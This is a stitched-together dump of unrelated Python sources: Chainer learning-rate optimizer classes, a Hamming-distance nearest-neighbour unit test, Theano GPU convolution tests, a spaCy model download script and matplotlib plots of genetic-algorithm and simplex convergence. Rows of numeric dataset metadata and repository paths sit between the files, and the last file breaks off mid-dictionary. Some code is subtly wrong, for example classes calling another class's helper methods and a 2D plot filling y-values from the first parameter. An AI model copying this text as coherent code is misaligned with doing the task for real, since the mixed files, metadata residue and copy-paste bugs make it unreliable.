self.optimizer_set[i].update()
@staticmethod
def _grad(ele):
if hasattr(ele, 'W') and hasattr(ele.W, 'grad'):
return (ele, ele.W)
if hasattr(ele, 'beta') and hasattr(ele.beta, 'grad'):
return (ele, ele.beta)
return None
@staticmethod
def _children(ele):
return hasattr(ele, '_children')
@staticmethod
def _find(model):
links = []
def dfs(ele):
grad = OptimizerStochasticDepth._grad(ele)
if grad is not None:
links.append(grad)
else:
if OptimizerStochasticDepth._children(ele):
for link in ele._children:
dfs(ele[link])
dfs(model)
return links
class OptimizerPReLUNet(Optimizer):
def __init__(self, model=None, lr=0.01, momentum=0.9, schedule=(150, 225), weight_decay=5.0e-4):
super(OptimizerPReLUNet, self).__init__(model)
optimizer = optimizers.MomentumSGD(lr, momentum)
weight_decay = chainer.optimizer.WeightDecay(weight_decay)
optimizer.setup(self.model)
optimizer.add_hook(weight_decay)
self.optimizer = optimizer
self.schedule = schedule
self.lr = lr
self.momentum = momentum
def __call__(self, i):
if i in self.schedule:
lr = self.optimizer.lr / 10
print('lr is changed: {} -> {}'.format(self.optimizer.lr, lr))
self.optimizer.lr = lr
class OptimizerResnetInResnet(Optimizer):
def __init__(self, model=None, schedule=(42, 62), lr=0.1, momentum=0.9, weight_decay=1.0e-4):
super(OptimizerResnetInResnet, self).__init__(model)
optimizer = optimizers.MomentumSGD(lr, momentum)
weight_decay = chainer.optimizer.WeightDecay(weight_decay)
optimizer.setup(self.model)
optimizer.add_hook(weight_decay)
self.optimizer = optimizer
self.schedule = schedule
self.lr = lr
self.momentum = momentum
self.weight_decay = weight_decay
def __call__(self, i):
if i in self.schedule:
lr = self.optimizer.lr / 10
print('lr is changed: {} -> {}'.format(self.optimizer.lr, lr))
self.optimizer.lr = lr
class OptimizerAppendixA(Optimizer):
def __init__(self, model=None, schedule=(150, 175), lr=0.1, momentum=0.9, weight_decay=1.0e-4):
super(OptimizerAppendixA, self).__init__(model)
optimizer = optimizers.MomentumSGD(lr, momentum)
weight_decay = chainer.optimizer.WeightDecay(weight_decay)
optimizer.setup(self.model)
optimizer.add_hook(weight_decay)
self.optimizer = optimizer
self.schedule = schedule
self.lr = lr
self.momentum = momentum
self.weight_decay = weight_decay
def __call__(self, i):
if i in self.schedule:
lr = self.optimizer.lr / 10
print('lr is changed: {} -> {}'.format(self.optimizer.lr, lr))
self.optimizer.lr = lr
class OptimizerWeightedRes(Optimizer):
def __init__(self, model=None, lr=0.1, momentum=0.9, schedule=(int(32000. / (50000. / 128)), int(48000. / (50000. / 128))), weight_decay=1.0e-4, weight_lr=0.001):
super(OptimizerWeightedRes, self).__init__(model)
self.lr = lr
self.momentum = momentum
self.schedule = schedule
self.weight_decay = weight_decay
self.weight_lr = weight_lr
all_links = OptimizerWeightedRes._find(model)
optimizer_set = []
for link in all_links:
if link[1].data.shape == (1, 1, 1, 1):
optimizer = optimizers.MomentumSGD(weight_lr, momentum)
else:
optimizer = optimizers.MomentumSGD(lr, momentum)
weight_decay = chainer.optimizer.WeightDecay(self.weight_decay)
optimizer.setup(link[0])
optimizer.add_hook(weight_decay)
optimizer_set.append(optimizer)
self.optimizer_set = optimizer_set
self.all_links = all_links
self.flag = False
def __call__(self, i):
if i in self.schedule:
for optimizer in self.optimizer_set:
lr = optimizer.lr / 10
if self.flag is False:
print('lr is changed: {} -> {}'.format(optimizer.lr, lr))
self.flag = True
optimizer.lr = lr
self.flag = False
def update(self):
for i in six.moves.range(len(self.all_links)):
if self.all_links[i][1].grad is not None:
self.optimizer_set[i].update()
@staticmethod
def _grad(ele):
if hasattr(ele, 'W') and hasattr(ele.W, 'grad'):
return (ele, ele.W)
if hasattr(ele, 'beta') and hasattr(ele.beta, 'grad'):
return (ele, ele.beta)
return None
@staticmethod
def _children(ele):
return hasattr(ele, '_children')
@staticmethod
def _find(model):
links = []
def dfs(ele):
grad = OptimizerStochasticDepth._grad(ele)
if grad is not None:
links.append(grad)
else:
if OptimizerWeightedRes._children(ele):
for link in ele._children:
dfs(ele[link])
dfs(model)
return links
class OptimizerPyramidalResNetWithSSD(Optimizer):
def __init__(self, model=None, lr=0.5, momentum=0.9, schedule=(150, 225), weight_decay=1.0e-4):
super(OptimizerPyramidalResNetWithSSD, self).__init__(model)
self.lr = lr
self.momentum = momentum
self.schedule = schedule
self.weight_decay = weight_decay
all_links = OptimizerPyramidalResNetWithSSD._find(model)
optimizer_set = []
for link in all_links:
optimizer = optimizers.MomentumSGD(lr, momentum)
weight_decay = chainer.optimizer.WeightDecay(self.weight_decay)
optimizer.setup(link[0])
optimizer.add_hook(weight_decay)
optimizer_set.append(optimizer)
self.optimizer_set = optimizer_set
self.all_links = all_links
self.flag = False
def __call__(self, i):
if i in self.schedule:
for optimizer in self.optimizer_set:
lr = optimizer.lr / 10
if self.flag is False:
print('lr is changed: {} -> {}'.format(optimizer.lr, lr))
self.flag = True
optimizer.lr = lr
self.flag = False
def update(self):
for i in six.moves.range(len(self.all_links)):
if self.all_links[i][1].grad is not None:
self.optimizer_set[i].update()
@staticmethod
def _grad(ele):
if hasattr(ele, 'W') and hasattr(ele.W, 'grad'):
return (ele, ele.W)
if hasattr(ele, 'beta') and hasattr(ele.beta, 'grad'):
return (ele, ele.beta)
return None
@staticmethod
def _children(ele):
return hasattr(ele, '_children')
@staticmethod
def _find(model):
links = []
def dfs(ele):
grad = OptimizerStochasticDepth._grad(ele)
if grad is not None:
links.append(grad)
else:
if OptimizerStochasticDepth._children(ele):
for link in ele._children:
dfs(ele[link])
dfs(model)
return links
| 34.442748
| 166
| 0.597473
| 2,660
| 22,560
| 4.883459
| 0.05188
| 0.091455
| 0.054273
| 0.041878
| 0.87806
| 0.868283
| 0.860662
| 0.845881
| 0.832871
| 0.815935
| 0
| 0.025113
| 0.293972
| 22,560
| 654
| 167
| 34.495413
| 0.790432
| 0.004167
| 0
| 0.839851
| 0
| 0
| 0.027289
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.126629
| false
| 0.001862
| 0.007449
| 0.009311
| 0.219739
| 0.042831
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4306fae2fbd0b10867c12caf8af0831f38688c0f
| 2,884
|
py
|
Python
|
tests/algorihtm_tests/find_nearest_tests/string_data/hamming_distance_test.py
|
cenkbircanoglu/clustering
|
0a97fbf43e58e65e8d9eed30eecff00bcd47f093
|
[
"MIT"
] | 23
|
2015-01-21T01:39:11.000Z
|
2019-08-27T09:43:39.000Z
|
tests/algorihtm_tests/find_nearest_tests/string_data/hamming_distance_test.py
|
cenkbircanoglu/clustering
|
0a97fbf43e58e65e8d9eed30eecff00bcd47f093
|
[
"MIT"
] | 1
|
2015-01-18T08:52:30.000Z
|
2015-01-18T08:52:30.000Z
|
tests/algorihtm_tests/find_nearest_tests/string_data/hamming_distance_test.py
|
cenkbircanoglu/clustering
|
0a97fbf43e58e65e8d9eed30eecff00bcd47f093
|
[
"MIT"
] | 6
|
2015-03-23T16:58:18.000Z
|
2019-03-12T06:31:56.000Z
|
from unittest import TestCase
from similarityPy.algorithms.find_nearest import FindNearest
from similarityPy.measure.string_data.hamming_distance import HammingDistance
from tests import test_logger
__author__ = 'cenk'
class FindNearestTest(TestCase):
def setUp(self):
pass
def test_hamming_distance(self):
test_logger.debug("FindNearestTest - test_hamming_distance Starts")
points = ["abcdef", "abcefg", "abcdeg"]
point = "abcdef"
find_nearest = FindNearest(points, point, HammingDistance)
find_nearest.process()
nearest = find_nearest.get_result()
self.assertEquals("abcdef", nearest)
points = ["abcXdef", "abcXefg", "abcXdeg"]
point = "abcdefg"
find_nearest = FindNearest(points, point, HammingDistance)
find_nearest.process()
nearest = find_nearest.get_result()
self.assertEquals("abcXefg", nearest)
points = ["abcXdef", "abcXefg", "abcXdeg"]
point = "1234567"
find_nearest = FindNearest(points, point, HammingDistance)
find_nearest.process()
nearest = find_nearest.get_result()
self.assertEquals("abcXdef", nearest)
points = ["abcXdef", "abcXefg", "abcXdeg"]
point = "123456 "
find_nearest = FindNearest(points, point, HammingDistance)
find_nearest.process()
nearest = find_nearest.get_result()
self.assertEquals("abcXdef", nearest)
test_logger.debug("FindNearestTest - test_hamming_distance Ends")
def test_hamming_distance_multiple(self):
test_logger.debug("FindNearestTest - test_hamming_distance_multiple Starts")
points = ["abcdef", "abcefg", "abcdeg"]
point = "abcdef"
find_nearest = FindNearest(points, point, HammingDistance, k=2)
find_nearest.process()
nearest = find_nearest.get_result()
self.assertEquals(['abcdef', 'abcdeg'], nearest)
points = ["abcXdef", "abcXefg", "abcXdeg"]
point = "abcdefg"
find_nearest = FindNearest(points, point, HammingDistance, k=2)
find_nearest.process()
nearest = find_nearest.get_result()
self.assertEquals(['abcXefg', 'abcXdeg'], nearest)
points = ["abcXdef", "abcXefg", "abcXdeg"]
point = "1234567"
find_nearest = FindNearest(points, point, HammingDistance, k=2)
find_nearest.process()
nearest = find_nearest.get_result()
self.assertEquals(['abcXdef', 'abcXdef'], nearest)
points = ["abcXdef", "abcXefg", "abcXdeg"]
point = "123456 "
find_nearest = FindNearest(points, point, HammingDistance, k=2)
find_nearest.process()
nearest = find_nearest.get_result()
self.assertEquals(['abcXdef', 'abcXdef'], nearest)
test_logger.debug("FindNearestTest - test_hamming_distance_multiple Ends")
| 36.506329
| 84
| 0.658114
| 283
| 2,884
| 6.498233
| 0.166078
| 0.149538
| 0.095704
| 0.121805
| 0.836324
| 0.836324
| 0.836324
| 0.836324
| 0.769984
| 0.716694
| 0
| 0.013477
| 0.228155
| 2,884
| 79
| 85
| 36.506329
| 0.812668
| 0
| 0
| 0.709677
| 0
| 0
| 0.172964
| 0.035355
| 0
| 0
| 0
| 0
| 0.129032
| 1
| 0.048387
| false
| 0.016129
| 0.064516
| 0
| 0.129032
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4326ac5881117a1bdb7d0b1524ce7aab291874a5
| 7,322
|
py
|
Python
|
theano/gpuarray/tests/test_abstractconv.py
|
gundun/theano
|
09d17fff10487dca7149e34601b8c6efdc572a19
|
[
"BSD-3-Clause"
] | null | null | null |
theano/gpuarray/tests/test_abstractconv.py
|
gundun/theano
|
09d17fff10487dca7149e34601b8c6efdc572a19
|
[
"BSD-3-Clause"
] | null | null | null |
theano/gpuarray/tests/test_abstractconv.py
|
gundun/theano
|
09d17fff10487dca7149e34601b8c6efdc572a19
|
[
"BSD-3-Clause"
] | null | null | null |
from __future__ import absolute_import, print_function, division
from nose.plugins.skip import SkipTest
import numpy
from theano.tensor.nnet.tests import test_abstract_conv
from ..type import GpuArrayType, gpuarray_shared_constructor, get_context
from ..dnn import dnn_available, GpuDnnConv, GpuDnnConvGradW, GpuDnnConvGradI
from ..blas import (
GpuCorrMM, GpuCorrMM_gradWeights, GpuCorrMM_gradInputs,
GpuCorr3dMM, GpuCorr3dMM_gradWeights, GpuCorr3dMM_gradInputs)
from .config import mode_with_gpu, test_ctx_name
from pygpu import gpuarray
gpu_ftensor4 = GpuArrayType(dtype='float32', broadcastable=(False,) * 4)
class TestDnnConv2d(test_abstract_conv.BaseTestConv2d):
@classmethod
def setup_class(cls):
test_abstract_conv.BaseTestConv2d.setup_class()
cls.shared = staticmethod(gpuarray_shared_constructor)
# provide_shape is not used by the cuDNN impementation
cls.provide_shape = [False]
def tcase(self, i, f, s, b, flip, provide_shape, fd=(1, 1)):
if not dnn_available(test_ctx_name):
raise SkipTest(dnn_available.msg)
mode = mode_with_gpu
if fd != (1, 1):
raise SkipTest("Doesn't have CUDNN implementation")
o = self.get_output_shape(i, f, s, b, fd)
self.run_fwd(inputs_shape=i, filters_shape=f, subsample=s,
verify_grad=True, mode=mode,
provide_shape=provide_shape, border_mode=b,
filter_flip=flip, target_op=GpuDnnConv)
self.run_gradweight(inputs_shape=i, filters_shape=f,
output_shape=o, subsample=s,
verify_grad=True, mode=mode,
provide_shape=provide_shape, border_mode=b,
filter_flip=flip, target_op=GpuDnnConvGradW)
self.run_gradinput(inputs_shape=i, filters_shape=f,
output_shape=o, subsample=s,
verify_grad=True, mode=mode,
provide_shape=provide_shape, border_mode=b,
filter_flip=flip, target_op=GpuDnnConvGradI)
class TestDnnConv3d(test_abstract_conv.BaseTestConv3d):
@classmethod
def setup_class(cls):
test_abstract_conv.BaseTestConv3d.setup_class()
cls.shared = staticmethod(gpuarray_shared_constructor)
# provide_shape is not used by the cuDNN impementation
cls.provide_shape = [False]
def tcase(self, i, f, s, b, flip, provide_shape, fd=(1, 1, 1)):
if not dnn_available(test_ctx_name):
raise SkipTest(dnn_available.msg)
mode = mode_with_gpu
if fd != (1, 1, 1):
raise SkipTest("Doesn't have CUDNN implementation")
o = self.get_output_shape(i, f, s, b, fd)
self.run_fwd(inputs_shape=i, filters_shape=f, subsample=s,
verify_grad=True, mode=mode,
provide_shape=provide_shape, border_mode=b,
filter_flip=flip, target_op=GpuDnnConv)
self.run_gradweight(inputs_shape=i, filters_shape=f,
output_shape=o, subsample=s,
verify_grad=True, mode=mode,
provide_shape=provide_shape, border_mode=b,
filter_flip=flip, target_op=GpuDnnConvGradW)
self.run_gradinput(inputs_shape=i, filters_shape=f,
output_shape=o, subsample=s,
verify_grad=True, mode=mode,
provide_shape=provide_shape, border_mode=b,
filter_flip=flip, target_op=GpuDnnConvGradI)
class TestCorrMMConv2d(test_abstract_conv.BaseTestConv2d):
@classmethod
def setup_class(cls):
test_abstract_conv.BaseTestConv2d.setup_class()
cls.shared = staticmethod(gpuarray_shared_constructor)
cls.mode = mode_with_gpu.excluding('cudnn')
def tcase(self, i, f, s, b, flip, provide_shape, fd=(1, 1)):
mode = self.mode
o = self.get_output_shape(i, f, s, b, fd)
self.run_fwd(inputs_shape=i, filters_shape=f,
subsample=s, verify_grad=True, mode=mode,
provide_shape=provide_shape, border_mode=b,
filter_flip=flip, target_op=(GpuCorrMM,
GpuCorrMM_gradWeights,
GpuCorrMM_gradInputs),
filter_dilation=fd)
self.run_gradweight(inputs_shape=i, filters_shape=f,
output_shape=o, subsample=s,
verify_grad=True, mode=mode,
provide_shape=provide_shape, border_mode=b,
filter_flip=flip,
target_op=GpuCorrMM_gradWeights,
filter_dilation=fd)
self.run_gradinput(inputs_shape=i, filters_shape=f,
output_shape=o, subsample=s,
verify_grad=True, mode=mode,
provide_shape=provide_shape, border_mode=b,
filter_flip=flip,
target_op=GpuCorrMM_gradInputs,
filter_dilation=fd)
class TestCorrMMConv3d(test_abstract_conv.BaseTestConv3d):
@classmethod
def setup_class(cls):
test_abstract_conv.BaseTestConv3d.setup_class()
cls.shared = staticmethod(gpuarray_shared_constructor)
cls.mode = mode_with_gpu.excluding('cudnn')
def tcase(self, i, f, s, b, flip, provide_shape, fd=(1, 1, 1)):
mode = self.mode
o = self.get_output_shape(i, f, s, b, fd)
self.run_fwd(inputs_shape=i, filters_shape=f,
subsample=s, verify_grad=True, mode=mode,
provide_shape=provide_shape, border_mode=b,
filter_flip=flip, target_op=(GpuCorr3dMM,
GpuCorr3dMM_gradWeights,
GpuCorr3dMM_gradInputs),
filter_dilation=fd)
self.run_gradweight(inputs_shape=i, filters_shape=f,
output_shape=o, subsample=s,
verify_grad=True, mode=mode,
provide_shape=provide_shape, border_mode=b,
filter_flip=flip,
target_op=GpuCorr3dMM_gradWeights,
filter_dilation=fd)
self.run_gradinput(inputs_shape=i, filters_shape=f,
output_shape=o, subsample=s,
verify_grad=True, mode=mode,
provide_shape=provide_shape, border_mode=b,
filter_flip=flip,
target_op=GpuCorr3dMM_gradInputs,
filter_dilation=fd)
class TestDnnConvTypes(test_abstract_conv.TestConvTypes):
def setUp(self):
self.input = gpu_ftensor4()
self.filters = gpu_ftensor4()
self.topgrad = gpu_ftensor4()
self.constant_tensor = gpuarray.array(
numpy.zeros((3, 5, 7, 11), dtype='float32'),
context=get_context(test_ctx_name))
| 45.7625
| 77
| 0.584813
| 805
| 7,322
| 5.040994
| 0.142857
| 0.094628
| 0.035485
| 0.056185
| 0.835633
| 0.779941
| 0.779941
| 0.779941
| 0.779941
| 0.779941
| 0
| 0.010091
| 0.336793
| 7,322
| 159
| 78
| 46.050314
| 0.825577
| 0.01434
| 0
| 0.731343
| 0
| 0
| 0.012476
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.067164
| false
| 0
| 0.067164
| 0
| 0.171642
| 0.007463
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4a2f82ded4f11761e4a62f3536a40ebe8d6375c7
| 177
|
py
|
Python
|
pre_requisites.py
|
vishwachintu/Resume-rater
|
61234565eb9953a4b3a71957441501b6cd008b76
|
[
"MIT"
] | null | null | null |
pre_requisites.py
|
vishwachintu/Resume-rater
|
61234565eb9953a4b3a71957441501b6cd008b76
|
[
"MIT"
] | null | null | null |
pre_requisites.py
|
vishwachintu/Resume-rater
|
61234565eb9953a4b3a71957441501b6cd008b76
|
[
"MIT"
] | null | null | null |
import os
# Install SpaCy Dependencies
os.system('python3 -m spacy download en_core_web_lg')
os.system('python3 -m spacy download en_core_web_sm')
# Install nltk Dependencies
| 22.125
| 53
| 0.79661
| 28
| 177
| 4.821429
| 0.535714
| 0.118519
| 0.222222
| 0.237037
| 0.562963
| 0.562963
| 0.562963
| 0.562963
| 0.562963
| 0
| 0
| 0.012903
| 0.124294
| 177
| 7
| 54
| 25.285714
| 0.858065
| 0.293785
| 0
| 0
| 0
| 0
| 0.655738
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.333333
| 0
| 0.333333
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
4a6f14b834ce8f74a652e76b98d54a7fdcf20734
| 22,467
|
py
|
Python
|
src/picasso/utils/data_visualization/optimization_plots.py
|
sreimond/picasso
|
89948b1707f44ca03c566da1d4424d9bc208e380
|
[
"MIT"
] | null | null | null |
src/picasso/utils/data_visualization/optimization_plots.py
|
sreimond/picasso
|
89948b1707f44ca03c566da1d4424d9bc208e380
|
[
"MIT"
] | null | null | null |
src/picasso/utils/data_visualization/optimization_plots.py
|
sreimond/picasso
|
89948b1707f44ca03c566da1d4424d9bc208e380
|
[
"MIT"
] | 1
|
2021-02-26T18:33:33.000Z
|
2021-02-26T18:33:33.000Z
|
# -*- coding: utf-8 -*-
"""
Created on Mon Feb 5 10:57:10 2018
@author: sreimond
"""
import matplotlib
matplotlib.use('agg')
import sys
sys.path.insert(0,'../optimization')
import numpy as np
from copy import deepcopy
import pylab
from mpl_toolkits.mplot3d import Axes3D
import warnings
#import SOBGA, SOCGA, MOCGA, downhill_simplex
from ..optimization import SOBGA
from ..optimization import SOCGA
from ..optimization import MOCGA
from ..optimization import downhill_simplex
def plot_convergence( optimization_result ):
"""
The function `plot_convergence` function inside the optimization_plots
module visualizes the convergence of a GA result as obtained via the
optimization.SOBGA or optimization.SOCGA modules.
"""
if (isinstance(optimization_result,downhill_simplex.Simplex)):
return _plot_convergence_ds( optimization_result )
if not (isinstance(optimization_result,SOBGA.Population) or isinstance(optimization_result,SOCGA.Population)):
warnings.warn('Please use the SOBGA or SOCGA class.')
return
x = optimization_result.development['generation']
y_best = optimization_result.development['best_fitness']
y_mean = optimization_result.development['mean_fitness']
# settings
params = {
'axes.labelsize': 8,
'font.size': 8,
'legend.fontsize': 8,
'xtick.labelsize': 8,
'ytick.labelsize': 8,
'lines.linewidth':1,
'grid.color':'k',
'grid.linestyle':':',
'grid.linewidth':0.5,
'legend.facecolor':'w',
'legend.edgecolor':'w',
'legend.numpoints':1,
'legend.framealpha':1,
'text.usetex': False,
'figure.figsize': [6,6]
}
pylab.rcParams.update(params)
fig,ax = pylab.subplots()
ax.plot(x,y_best,'-k',label='max. fitness')
ax.plot(x,y_mean,'--k',label='mean fitness')
ax.set_xlabel('generation')
ax.set_ylabel('fitness')
ax.grid()
ax.legend()
return fig, ax
def _plot_convergence_ds( optimization_result ):
"""
The function `_plot_convergence_ds` function inside the optimization_plots
module visualizes the convergence of a Downhill Simplex result as obtained
via the optimization.downhill_simplex module.
"""
x = optimization_result.development['iteration']
y_best = optimization_result.development['min_cost']
y_mean = optimization_result.development['mean_cost']
# settings
params = {
'axes.labelsize': 8,
'font.size': 8,
'legend.fontsize': 8,
'xtick.labelsize': 8,
'ytick.labelsize': 8,
'lines.linewidth':1,
'grid.color':'k',
'grid.linestyle':':',
'grid.linewidth':0.5,
'legend.facecolor':'w',
'legend.edgecolor':'w',
'legend.numpoints':1,
'legend.framealpha':1,
'text.usetex': False,
'figure.figsize': [6,6]
}
pylab.rcParams.update(params)
fig,ax = pylab.subplots()
ax.plot(x,y_best,'-k',label='min. cost')
ax.plot(x,y_mean,'--k',label='mean cost')
ax.set_xlabel('iteration')
ax.set_ylabel('cost')
ax.grid()
ax.legend()
return fig, ax
def plot_objective_function( optimization_result ):
"""
The function `plot_objective_function` function inside the optimization_plots
module visualizes 1D line or the 2D cost function and the final population
of a GA result as obtained via the optimization.SOBGA or optimization.SOCGA
modules.
"""
if (isinstance(optimization_result,downhill_simplex.Simplex)):
return _plot_objective_function_ds( optimization_result )
if not (isinstance(optimization_result,SOBGA.Population) or isinstance(optimization_result,SOCGA.Population)):
warnings.warn('Please use the SOBGA or SOCGA class.')
return
f = optimization_result.config['objective_function']
if f.dimension > 2:
warnings.warn('Only 1D or 2D objective functions are supported.')
return
elif f.dimension == 1:
return _plot_objective_function1D( optimization_result )
elif f.dimension == 2:
return _plot_objective_function2D( optimization_result )
def _plot_objective_function1D( optimization_result ):
f = optimization_result.config['objective_function']
t = np.linspace(-1.0,1.0,num=100)
parameters = []
for parameter in f.parameters:
parameters.append( deepcopy(parameter) )
x = np.zeros(len(t))
for ix,ti in enumerate(t):
parameters[0].set_mapping_parameter( ti )
x[ix] = parameters[0].value
ix = np.argsort(x)
xs = [x[jx] for jx in ix]
ts = [t[jx] for jx in ix]
ys = np.ones(len(t)) * np.nan
for ix,ti in enumerate(ts):
parameters[0].set_mapping_parameter( ti )
value = f.evaluate(parameters)
if f.determine_feasibility(parameters) == 1:
ys[ix] = value
x_pop = []
y_pop = []
for individual in optimization_result.individuals:
x_pop.append( individual.genes[0].value )
value = f.evaluate( individual.genes )
y_pop.append(value)
# settings
params = {
'axes.labelsize': 8,
'font.size': 8,
'legend.fontsize': 8,
'xtick.labelsize': 8,
'ytick.labelsize': 8,
'lines.linewidth':1,
'grid.color':'k',
'grid.linestyle':':',
'grid.linewidth':0.5,
'legend.facecolor':'w',
'legend.edgecolor':'w',
'legend.numpoints':1,
'legend.framealpha':1,
'text.usetex': False,
'figure.figsize': [6,6]
}
pylab.rcParams.update(params)
fig,ax = pylab.subplots()
ax.plot(xs,ys,'-k',label='f(x)')
ax.plot(x_pop,y_pop,'xk',label='final population')
ax.plot(x_pop[0],y_pop[0],'or',label='best individual')
x_true = parameters[0].true_value
y_true = f.global_minimum
if (x_true is not None) and (y_true is not None):
ax.plot(x_true,y_true,'*b',label='global minimum')
ax.set_xlabel('x')
ax.set_ylabel('f(x)')
ax.grid()
ax.legend()
return fig, ax
def _plot_objective_function2D( optimization_result ):
f = optimization_result.config['objective_function']
tx = np.linspace(-1.0,1.0,num=100)
ty = np.linspace(-1.0,1.0,num=100)
parameters = []
for parameter in f.parameters:
parameters.append( deepcopy(parameter) )
x = np.zeros(len(tx))
y = np.zeros(len(ty))
for ix,_ in enumerate(tx):
parameters[0].set_mapping_parameter( tx[ix] )
x[ix] = parameters[0].value
parameters[1].set_mapping_parameter( ty[ix] )
y[ix] = parameters[0].value
ix = np.argsort(x)
txs = [tx[jx] for jx in ix]
ix = np.argsort(y)
tys = [ty[jx] for jx in ix]
txg,tyg = np.meshgrid(txs,tys)
x = np.zeros(txg.shape)
y = np.zeros(txg.shape)
c = np.ones(txg.shape)*np.nan
for ix in list(range(txg.shape[0])):
for iy in list(range(txg.shape[1])):
parameters[0].set_mapping_parameter( txg[ix,iy] )
parameters[1].set_mapping_parameter( tyg[ix,iy])
x[ix,iy] = parameters[0].value
y[ix,iy] = parameters[1].value
value = f.evaluate(parameters)
if f.determine_feasibility(parameters) == 1:
c[ix,iy] = value
x_pop = []
y_pop = []
c_pop = []
for individual in optimization_result.individuals:
x_pop.append( individual.genes[0].value )
y_pop.append( individual.genes[1].value )
value = f.evaluate( individual.genes )
c_pop.append(value)
# settings
params = {
'axes.labelsize': 8,
'font.size': 8,
'legend.fontsize': 8,
'xtick.labelsize': 8,
'ytick.labelsize': 8,
'lines.linewidth':1,
'grid.color':'k',
'grid.linestyle':':',
'grid.linewidth':0.5,
'legend.facecolor':'w',
'legend.edgecolor':'w',
'legend.numpoints':1,
'legend.framealpha':1,
'text.usetex': False,
'figure.figsize': [6,6]
}
pylab.rcParams.update(params)
fig,ax = pylab.subplots()
ax.contourf(x,y,c,cmap=pylab.cm.rainbow)
# ax.imshow(c)
# ax.pcolor(x,y,c)
# ax.scatter(x,y,c=c)
ax.plot(x_pop,y_pop,'xk',label='final population')
ax.plot(x_pop[0],y_pop[0],'or',label='best individual')
x_true = parameters[0].true_value
y_true = parameters[1].true_value
if (x_true is not None) and (y_true is not None):
ax.plot(x_true,y_true,'*b',label='global minimum')
ax.set_xlabel('x')
ax.set_ylabel('y')
ax.legend()
return fig, ax
def _plot_objective_function_ds( optimization_result ):
"""
The function `_plot_objective_function_ds` function inside the optimization_plots
module visualizes 1D line or the 2D cost function and the final population
of a DS result as obtained via the optimization.downhill_simplex module.
"""
f = optimization_result.objective_function
if f.dimension > 2:
warnings.warn('Only 1D or 2D objective functions are supported.')
return
elif f.dimension == 1:
return _plot_objective_function_ds_1D( optimization_result )
elif f.dimension == 2:
return _plot_objective_function_ds_2D( optimization_result )
def _plot_objective_function_ds_1D( optimization_result ):
f = optimization_result.objective_function
t = np.linspace(-1.0,1.0,num=100)
parameters = []
for parameter in f.parameters:
parameters.append( deepcopy(parameter) )
x = np.zeros(len(t))
for ix,ti in enumerate(t):
parameters[0].set_mapping_parameter( ti )
x[ix] = parameters[0].value
ix = np.argsort(x)
xs = [x[jx] for jx in ix]
ts = [t[jx] for jx in ix]
ys = np.ones(len(t)) * np.nan
for ix,ti in enumerate(ts):
parameters[0].set_mapping_parameter( ti )
value = f.evaluate(parameters)
if f.determine_feasibility(parameters) == 1:
ys[ix] = value
x_pop = []
y_pop = []
for vertex in optimization_result.vertices:
x_pop.append( vertex.parameters[0].value )
value = f.evaluate( vertex.parameters )
y_pop.append(value)
# settings
params = {
'axes.labelsize': 8,
'font.size': 8,
'legend.fontsize': 8,
'xtick.labelsize': 8,
'ytick.labelsize': 8,
'lines.linewidth':1,
'grid.color':'k',
'grid.linestyle':':',
'grid.linewidth':0.5,
'legend.facecolor':'w',
'legend.edgecolor':'w',
'legend.numpoints':1,
'legend.framealpha':1,
'text.usetex': False,
'figure.figsize': [6,6]
}
pylab.rcParams.update(params)
fig,ax = pylab.subplots()
ax.plot(xs,ys,'-k',label='f(x)')
ax.plot(x_pop,y_pop,'xk',label='final simplex')
ax.plot(x_pop[0],y_pop[0],'or',label='best vertex')
x_true = parameters[0].true_value
y_true = f.global_minimum
if (x_true is not None) and (y_true is not None):
ax.plot(x_true,y_true,'*b',label='global minimum')
ax.set_xlabel('x')
ax.set_ylabel('f(x)')
ax.grid()
ax.legend()
return fig, ax
def _plot_objective_function_ds_2D( optimization_result ):
f = optimization_result.objective_function
tx = np.linspace(-1.0,1.0,num=100)
ty = np.linspace(-1.0,1.0,num=100)
parameters = []
for parameter in f.parameters:
parameters.append( deepcopy(parameter) )
x = np.zeros(len(tx))
y = np.zeros(len(ty))
for ix,_ in enumerate(tx):
parameters[0].set_mapping_parameter( tx[ix] )
x[ix] = parameters[0].value
parameters[1].set_mapping_parameter( ty[ix] )
y[ix] = parameters[0].value
ix = np.argsort(x)
txs = [tx[jx] for jx in ix]
ix = np.argsort(y)
tys = [ty[jx] for jx in ix]
txg,tyg = np.meshgrid(txs,tys)
x = np.zeros(txg.shape)
y = np.zeros(txg.shape)
c = np.ones(txg.shape)*np.nan
for ix in list(range(txg.shape[0])):
for iy in list(range(txg.shape[1])):
parameters[0].set_mapping_parameter( txg[ix,iy] )
parameters[1].set_mapping_parameter( tyg[ix,iy])
x[ix,iy] = parameters[0].value
y[ix,iy] = parameters[1].value
value = f.evaluate(parameters)
if f.determine_feasibility(parameters) == 1:
c[ix,iy] = value
x_pop = []
y_pop = []
c_pop = []
for vertex in optimization_result.vertices:
x_pop.append( vertex.parameters[0].value )
y_pop.append( vertex.parameters[1].value )
value = f.evaluate( vertex.parameters )
c_pop.append(value)
# settings
params = {
'axes.labelsize': 8,
'font.size': 8,
'legend.fontsize': 8,
'xtick.labelsize': 8,
'ytick.labelsize': 8,
